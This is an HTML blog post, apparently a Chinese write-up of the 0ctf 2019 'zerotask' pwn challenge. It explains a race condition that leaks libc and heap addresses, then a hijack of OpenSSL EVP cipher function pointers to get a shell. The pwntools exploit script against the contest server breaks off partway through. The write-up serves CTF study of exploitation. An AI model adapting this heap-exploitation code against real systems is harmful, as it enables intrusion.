<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />



  <meta name="google-site-verification" content="n74fzVGuzCcR7QhYWu-qaPH7lKOjZC3b3tDU0egKMNA" />














  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.3">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.3" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="0ctf2019-zerotask题解周末打了0ctf，队里的师傅们一共做出来3道pwn。感觉这几道题都需要记录一下，而且好久都没有更新博客了，借着这次机会更新一下。 本片介绍的是zerotask，这题比赛的过程中发现了两种解法，赛后调了另一种解法，感觉挺有意思。 程序功能分析查看程序提供的菜单，可以知道程序提供了三种功能，分别是添加task、删除task以及运行task 1234567int m">
<meta property="og:type" content="article">
<meta property="og:title" content="0ctf2019-zerotask题解">
<meta property="og:url" content="https://e3pem.github.io/2019/03/27/0ctf-2019/0ctf2019-zerotask/index.html">
<meta property="og:site_name" content="e3pem&#39;s Blog">
<meta property="og:description" content="0ctf2019-zerotask题解周末打了0ctf，队里的师傅们一共做出来3道pwn。感觉这几道题都需要记录一下，而且好久都没有更新博客了，借着这次机会更新一下。 本片介绍的是zerotask，这题比赛的过程中发现了两种解法，赛后调了另一种解法，感觉挺有意思。 程序功能分析查看程序提供的菜单，可以知道程序提供了三种功能，分别是添加task、删除task以及运行task 1234567int m">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-03-27T02:29:39.623Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="0ctf2019-zerotask题解">
<meta name="twitter:description" content="0ctf2019-zerotask题解周末打了0ctf，队里的师傅们一共做出来3道pwn。感觉这几道题都需要记录一下，而且好久都没有更新博客了，借着这次机会更新一下。 本片介绍的是zerotask，这题比赛的过程中发现了两种解法，赛后调了另一种解法，感觉挺有意思。 程序功能分析查看程序提供的菜单，可以知道程序提供了三种功能，分别是添加task、删除task以及运行task 1234567int m">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.3',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://e3pem.github.io/2019/03/27/0ctf-2019/0ctf2019-zerotask/"/>





  <title>0ctf2019-zerotask题解 | e3pem's Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">e3pem's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://e3pem.github.io/2019/03/27/0ctf-2019/0ctf2019-zerotask/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="e3pem">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="e3pem's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">0ctf2019-zerotask题解</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-03-27T10:30:52+08:00">
                2019-03-27
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/pwn/" itemprop="url" rel="index">
                    <span itemprop="name">pwn</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="0ctf2019-zerotask题解"><a href="#0ctf2019-zerotask题解" class="headerlink" title="0ctf2019-zerotask题解"></a>0ctf2019-zerotask题解</h1><p>周末打了0ctf，队里的师傅们一共做出来3道pwn。感觉这几道题都需要记录一下，而且好久都没有更新博客了，借着这次机会更新一下。</p>
<p>本片介绍的是zerotask，这题比赛的过程中发现了两种解法，赛后调了另一种解法，感觉挺有意思。</p>
<h2 id="程序功能分析"><a href="#程序功能分析" class="headerlink" title="程序功能分析"></a>程序功能分析</h2><p>查看程序提供的菜单，可以知道程序提供了三种功能，分别是添加task、删除task以及运行task</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">menu</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"1. Add task"</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"2. Delete task"</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"3. Go"</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">printf</span>(<span class="string">"Choice: "</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>通过分析，得到了程序中使用的结构体，命名为task：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">00000000 task            struc ; (sizeof=0x70, mappedto_4)</span><br><span class="line">00000000 data_ptr        dq ?</span><br><span class="line">00000008 data_size       dq ?</span><br><span class="line">00000010 flag            dd ?</span><br><span class="line">00000014 key             db 32 dup(?)</span><br><span class="line">00000034 iv              db 16 dup(?)</span><br><span class="line">00000044 field_44        dq ?</span><br><span class="line">0000004C field_4C        dq ?</span><br><span class="line">00000054 field_54        dd ?</span><br><span class="line">00000058 EVP_CIPHER_CTX_ptr dq ?</span><br><span class="line">00000060 id              dq ?</span><br><span class="line">00000068 nextptr         dq ?</span><br><span class="line">00000070 task            ends</span><br></pre></td></tr></table></figure></p>
<p>简要的对结构体中的字段进行一下介绍：</p>
<ul>
<li><code>data_ptr</code>字段指向一块堆上的内存，表示待加密或待解密的数据</li>
<li><code>data_size</code>表示数据的大小</li>
<li><code>flag</code>表示是加密还是解密</li>
<li><code>key</code>和<code>iv</code>分别表示密钥和iv向量</li>
<li><code>EVP_CIPHER_CTX_ptr</code>为用来进行加解密的上下文的一个指针</li>
<li><code>id</code>为task结构体的标识</li>
<li><code>nextptr</code>指向下一个task结构体，结构体之间通过链表连接起来</li>
</ul>
<p>程序功能简介：</p>
<ol>
<li>添加任务功能，程序首先分配一块0x70大小的内存用来存放task结构体，接着让用户输入key、iv以及data等信息，并完成加解密上下文的初始化。<em>这里的输入数据功能比较特别，如果输入的内容没有达到要求的长度，程序会一直等待输入</em></li>
<li>删除任务功能，根据用户输入task的id来确定删除哪一个任务，遍历任务链表来查找并free掉相关内存</li>
<li>运行任务功能，该功能会启动一个线程来执行，根据结构体中的内容来进行加解密操作，一共有三次执行该操作的机会</li>
</ol>
<h2 id="程序漏洞"><a href="#程序漏洞" class="headerlink" title="程序漏洞"></a>程序漏洞</h2><p>程序的漏洞在于：启动线程来执行任务时，在最开始处<code>sleep</code>了2秒，接着进行正常的加解密操作。因为是启动的线程，导致主线程的运行仍然不受影响，这样通过适当的利用可以控制task结构体的内容，进而劫持程序的运行</p>
<h2 id="利用方式一——劫持EVP-CIPHER-CTX-ptr指针实现利用"><a href="#利用方式一——劫持EVP-CIPHER-CTX-ptr指针实现利用" class="headerlink" title="利用方式一——劫持EVP_CIPHER_CTX_ptr指针实现利用"></a>利用方式一——劫持EVP_CIPHER_CTX_ptr指针实现利用</h2><h3 id="信息泄露"><a href="#信息泄露" class="headerlink" title="信息泄露"></a>信息泄露</h3><p>首先需要进行信息泄露，题中申请的堆块大小只要在0x1000以内都可以，同时2.27版本的libc中是存在tcache的。信息泄露的方式如下：</p>
<ul>
<li>申请两个大小不在tcache范围内的chunk如大小为0x410</li>
<li>把其中一个chunk送到加密函数（go）处进行加密</li>
<li>在加密的过程中，利用条件竞争，释放掉这两个chunk（task）。由于大小不在tcache范围内，它们会被放入到<code>unsorted bin</code>中，同时由于<code>unsorted bin</code>的双链表机制，<code>main_arena</code>和<code>heap</code>地址会写入到chunk的fd和bk字段中</li>
<li>再次申请task，存放数据的chunk大小为0x410，这时由于读入数据函数的特殊性（如果输入内容没达到指定长度，会一直等待用户的输入），我们等到加密完成后在输入数据，这样加密线程就是对<code>main_arena</code>和<code>heap</code>地址进行的加密了</li>
<li>对加密的结果利用同样的<code>key</code>和<code>iv</code>解密即可得到<code>libc</code>和<code>heap</code>的地址</li>
</ul>
<h3 id="劫持程序流程"><a href="#劫持程序流程" class="headerlink" title="劫持程序流程"></a>劫持程序流程</h3><p>task结构体里面存放着<code>EVP_CIPHER_CTX_ptr</code>这样一个指针，该指针指向的结构体如下：<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">evp_cipher_ctx_st</span> &#123;</span></span><br><span class="line">    <span class="comment">//cipher字段指向了另外一个结构体</span></span><br><span class="line">    <span class="keyword">const</span> EVP_CIPHER *cipher;</span><br><span class="line">    ENGINE *engine;             <span class="comment">/* functional reference if 'cipher' is</span></span><br><span class="line"><span class="comment">                                 * ENGINE-provided */</span></span><br><span class="line">    <span class="keyword">int</span> encrypt;                <span class="comment">/* encrypt or decrypt */</span></span><br><span class="line">    <span class="keyword">int</span> buf_len;                <span class="comment">/* number we have left */</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">char</span> oiv[EVP_MAX_IV_LENGTH]; <span class="comment">/* original iv */</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">char</span> iv[EVP_MAX_IV_LENGTH]; <span class="comment">/* working iv */</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">char</span> buf[EVP_MAX_BLOCK_LENGTH]; <span class="comment">/* saved partial block */</span></span><br><span class="line">    <span class="keyword">int</span> num;                    <span class="comment">/* used by cfb/ofb/ctr mode */</span></span><br><span class="line">    <span class="comment">/* <span class="doctag">FIXME:</span> Should this even exist? It appears unused */</span></span><br><span class="line">    <span class="keyword">void</span> *app_data;             <span class="comment">/* application stuff */</span></span><br><span class="line">    <span class="keyword">int</span> key_len;                <span class="comment">/* May change for variable length cipher */</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">long</span> flags;        <span class="comment">/* Various flags */</span></span><br><span class="line">    <span class="keyword">void</span> *cipher_data;          <span class="comment">/* per EVP data */</span></span><br><span class="line">    <span class="keyword">int</span> final_used;</span><br><span class="line">    <span class="keyword">int</span> block_mask;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">char</span> final[EVP_MAX_BLOCK_LENGTH]; <span class="comment">/* possible final block */</span></span><br><span class="line">&#125; <span class="comment">/* EVP_CIPHER_CTX */</span> ;</span><br></pre></td></tr></table></figure></p>
<p>在内存中对应的内容如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/30xg 0x55555575b580</span><br><span class="line">0x55555575b580: 0x0000000000000000      0x00000000000000b1</span><br><span class="line">0x55555575b590: 0x00007ffff7b98620      0x0000000000000000</span><br><span class="line">0x55555575b5a0: 0x0000000000000001      0x3131313131313131</span><br><span class="line">0x55555575b5b0: 0x3131313131313131      0x3131313131313131</span><br><span class="line">0x55555575b5c0: 0x3131313131313131      0x0000000000000000</span><br><span class="line">0x55555575b5d0: 0x0000000000000000      0x0000000000000000</span><br><span class="line">0x55555575b5e0: 0x0000000000000000      0x0000000000000000</span><br><span class="line">0x55555575b5f0: 0x0000000000000000      0x0000000000000020</span><br><span class="line">0x55555575b600: 0x0000000000000000      0x000055555575b640</span><br><span class="line">0x55555575b610: 0x0000000f00000000      0x0000000000000000</span><br><span class="line">0x55555575b620: 0x0000000000000000      0x0000000000000000</span><br></pre></td></tr></table></figure></p>
<p>结构体的第一个字段指向的仍然是一个结构体：<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">evp_cipher_st</span> &#123;</span></span><br><span class="line">    <span class="keyword">int</span> nid;</span><br><span class="line">    <span class="keyword">int</span> block_size;</span><br><span class="line">    <span class="comment">/* Default value for variable length ciphers */</span></span><br><span class="line">    <span class="keyword">int</span> key_len;</span><br><span class="line">    <span class="keyword">int</span> iv_len;</span><br><span class="line">    <span class="comment">/* Various flags */</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">long</span> flags;</span><br><span class="line">    <span class="comment">/* init key */</span></span><br><span class="line">    <span class="comment">//-------------------------&gt;需要劫持的函数指针，这里是初始化函数</span></span><br><span class="line">    <span class="keyword">int</span> (*init) (EVP_CIPHER_CTX *ctx, <span class="keyword">const</span> <span class="keyword">unsigned</span> <span class="keyword">char</span> *key,</span><br><span class="line">                 <span class="keyword">const</span> <span class="keyword">unsigned</span> <span class="keyword">char</span> *iv, <span class="keyword">int</span> enc);</span><br><span class="line">    <span class="comment">/* encrypt/decrypt data */</span></span><br><span class="line">    <span class="comment">//-------------------------&gt;需要劫持的函数指针，这里是加解密的函数</span></span><br><span class="line">    <span class="keyword">int</span> (*do_cipher) (EVP_CIPHER_CTX *ctx, <span class="keyword">unsigned</span> <span class="keyword">char</span> *out,</span><br><span class="line">                      <span class="keyword">const</span> <span class="keyword">unsigned</span> <span class="keyword">char</span> *in, <span class="keyword">size_t</span> inl);</span><br><span class="line">    <span class="comment">/* cleanup ctx */</span></span><br><span class="line">    <span class="keyword">int</span> (*cleanup) (EVP_CIPHER_CTX *);</span><br><span class="line">    <span class="comment">/* how big ctx-&gt;cipher_data needs to be */</span></span><br><span class="line">    <span class="keyword">int</span> ctx_size;</span><br><span class="line">    <span class="comment">/* Populate a ASN1_TYPE with parameters */</span></span><br><span class="line">    <span class="keyword">int</span> (*set_asn1_parameters) (EVP_CIPHER_CTX *, ASN1_TYPE *);</span><br><span class="line">    <span class="comment">/* Get parameters from a ASN1_TYPE */</span></span><br><span class="line">    <span class="keyword">int</span> (*get_asn1_parameters) (EVP_CIPHER_CTX *, ASN1_TYPE *);</span><br><span class="line">    <span class="comment">/* Miscellaneous operations */</span></span><br><span class="line">    <span class="keyword">int</span> (*ctrl) (EVP_CIPHER_CTX *, <span class="keyword">int</span> type, <span class="keyword">int</span> arg, <span class="keyword">void</span> *ptr);</span><br><span class="line">    <span class="comment">/* Application data */</span></span><br><span class="line">    <span class="keyword">void</span> *app_data;</span><br><span class="line">&#125; <span class="comment">/* EVP_CIPHER */</span> ;</span><br></pre></td></tr></table></figure></p>
<p>在内存中对应的内容大致如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/20xg 0x00007ffff7b98620</span><br><span class="line">0x7ffff7b98620: 0x00000010000001ab      0x0000001000000020</span><br><span class="line">0x7ffff7b98630: 0x0000000000001002      0x00007ffff78967e0</span><br><span class="line">0x7ffff7b98640: 0x00007ffff78967b0      0x0000000000000000</span><br><span class="line">0x7ffff7b98650: 0x0000000000000108      0x0000000000000000</span><br><span class="line">0x7ffff7b98660: 0x0000000000000000      0x0000000000000000</span><br><span class="line">0x7ffff7b98670: 0x0000000000000000      0x0000000000000000</span><br></pre></td></tr></table></figure></p>
<p>观察到该结构体中有多个指向函数的虚表指针，所以利用的思路就是自己伪造上述的两个结构体，将<code>evp_cipher_st</code>结构体中的指针指向<code>one_gadget</code>即可getshell。伪造起来也很容易，我们可以完全控制的就是加解密数据的内容，而且知道了堆地址，只需要修改指针指向我们伪造的这两个结构体即可。</p>
<p>exp如下：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> Crypto.Cipher <span class="keyword">import</span> AES</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">decrypt</span><span class="params">(key,iv,cipher)</span>:</span></span><br><span class="line">	cp = AES.new(key,AES.MODE_CBC, iv)</span><br><span class="line">	<span class="keyword">return</span> cp.decrypt(cipher)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">encrypt</span><span class="params">(key,iv,plain)</span>:</span></span><br><span class="line">	cp = AES.new(key,AES.MODE_CBC, iv)</span><br><span class="line">	<span class="keyword">return</span> cp.encrypt(plain)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(task_id,flag,key,iv,size,data)</span>:</span></span><br><span class="line">	p.sendlineafter(<span class="string">"Choice: "</span>, <span class="string">"1"</span>)</span><br><span class="line">	p.sendlineafter(<span class="string">"Task id : "</span>, str(task_id))</span><br><span class="line">	p.sendlineafter(<span class="string">"Encrypt(1) / Decrypt(2): "</span>, str(flag))</span><br><span class="line">	p.sendafter(<span class="string">"Key : "</span>,key)</span><br><span class="line">	p.sendafter(<span class="string">"IV : "</span>, iv)</span><br><span class="line">	p.sendlineafter(<span class="string">"Data Size : "</span>, str(size))</span><br><span class="line">	p.sendafter(<span class="string">"Data : "</span>, data)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span><span class="params">(task_id)</span>:</span></span><br><span class="line">	p.sendlineafter(<span class="string">"Choice: "</span>, <span class="string">"2"</span>)</span><br><span class="line">	p.sendlineafter(<span class="string">"Task id : "</span>, str(task_id))</span><br><span class="line"></span><br><span class="line">ATTACH=<span class="number">0</span></span><br><span class="line">DEBUG = <span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> DEBUG:</span><br><span class="line">	context.log_level = <span class="string">'debug'</span></span><br><span class="line">	context.terminal = [<span class="string">'tmux'</span>, <span class="string">'split'</span>, <span class="string">'-h'</span>]</span><br><span class="line">	libc = ELF(<span class="string">'/lib/x86_64-linux-gnu/libc.so.6'</span>)</span><br><span class="line">	p = process(<span class="string">"./task"</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">	context.log_level = <span class="string">'debug'</span></span><br><span class="line">	libc = ELF(<span class="string">'./libc-2.27.so'</span>)</span><br><span class="line">	p = remote(<span class="string">'111.186.63.201'</span>,<span class="number">10001</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 这里是加解密用的key和iv向量</span></span><br><span class="line">key = <span class="string">"\x00"</span>*<span class="number">0x20</span></span><br><span class="line">iv = <span class="string">"\x00"</span>*<span class="number">0x10</span></span><br><span class="line"><span class="comment">#context.log_level="debug"</span></span><br><span class="line"><span class="comment"># 进行信息泄露</span></span><br><span class="line">add(<span class="number">10</span>,<span class="number">1</span>, key, iv, <span class="number">0x30</span>, <span class="string">"x"</span>*<span class="number">0x30</span>)</span><br><span class="line">add(<span class="number">0</span>, <span class="number">1</span>, key, iv, <span class="number">0x410</span>, <span class="string">"x"</span>*<span class="number">0x410</span>)</span><br><span class="line">add(<span class="number">1</span>, <span class="number">1</span>, key, iv, <span class="number">0x10</span>, <span class="string">"y"</span>*<span class="number">0x10</span>)</span><br><span class="line">add(<span class="number">2</span>, <span class="number">1</span>, key, iv, <span class="number">0x410</span>, <span class="string">"x"</span>*<span class="number">0x410</span>)</span><br><span class="line">add(<span class="number">3</span>, <span class="number">1</span>, key, iv, <span class="number">0x10</span>, <span class="string">"y"</span>*<span class="number">0x10</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">"Choice: "</span>, <span class="string">"3"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Task id : "</span>, <span class="string">"0"</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ATTACH==<span class="number">1</span>:</span><br><span class="line">	gdb.attach(p,<span class="string">'''</span></span><br><span class="line"><span class="string">	'''</span>)</span><br><span class="line"></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">delete(<span class="number">2</span>)</span><br><span class="line">add(<span class="number">2</span>, <span class="number">1</span>, key, iv, <span class="number">0x500</span>, <span class="string">"c"</span>*<span class="number">0x500</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">"Choice: "</span>, <span class="string">"1"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Task id : "</span>, <span class="string">"1"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"Encrypt(1) / Decrypt(2): "</span>, <span class="string">"1"</span>)</span><br><span class="line">p.sendafter(<span class="string">"Key : "</span>, key)</span><br><span class="line">p.sendafter(<span class="string">"IV : "</span>, iv)</span><br><span class="line">p.sendlineafter(<span class="string">"Data Size : "</span>, str(<span class="number">0x410</span>))</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">"Ciphertext: \n"</span>)</span><br><span class="line">x = p.recv(<span class="number">49</span>*<span class="number">10</span>)</span><br><span class="line">cipher = x.replace(<span class="string">" "</span>,<span class="string">""</span>).replace(<span class="string">"\n"</span>,<span class="string">""</span>)</span><br><span class="line"><span class="comment"># 对加密的结果解密即可得到泄露的地址</span></span><br><span class="line">libc_addr = u64(decrypt(key, iv, cipher.decode(<span class="string">"hex"</span>))[<span class="number">0</span>:<span class="number">8</span>].ljust(<span class="number">8</span>,<span class="string">"\x00"</span>))</span><br><span class="line">heap_addr = u64(decrypt(key, iv, cipher.decode(<span class="string">"hex"</span>))[<span class="number">8</span>:<span class="number">16</span>].ljust(<span class="number">8</span>,<span class="string">"\x00"</span>))</span><br><span class="line">libc_base = libc_addr<span class="number">-0x3ec090</span></span><br><span class="line">system_addr = libc_base+libc.symbols[<span class="string">'system'</span>]</span><br><span class="line"></span><br><span class="line">print(hex(libc_addr))</span><br><span class="line">print(hex(heap_addr))</span><br><span class="line">print(hex(libc_base))</span><br><span class="line">p.send(<span class="string">'a'</span>*<span class="number">0x410</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 0x55f1b229b4b0</span></span><br><span 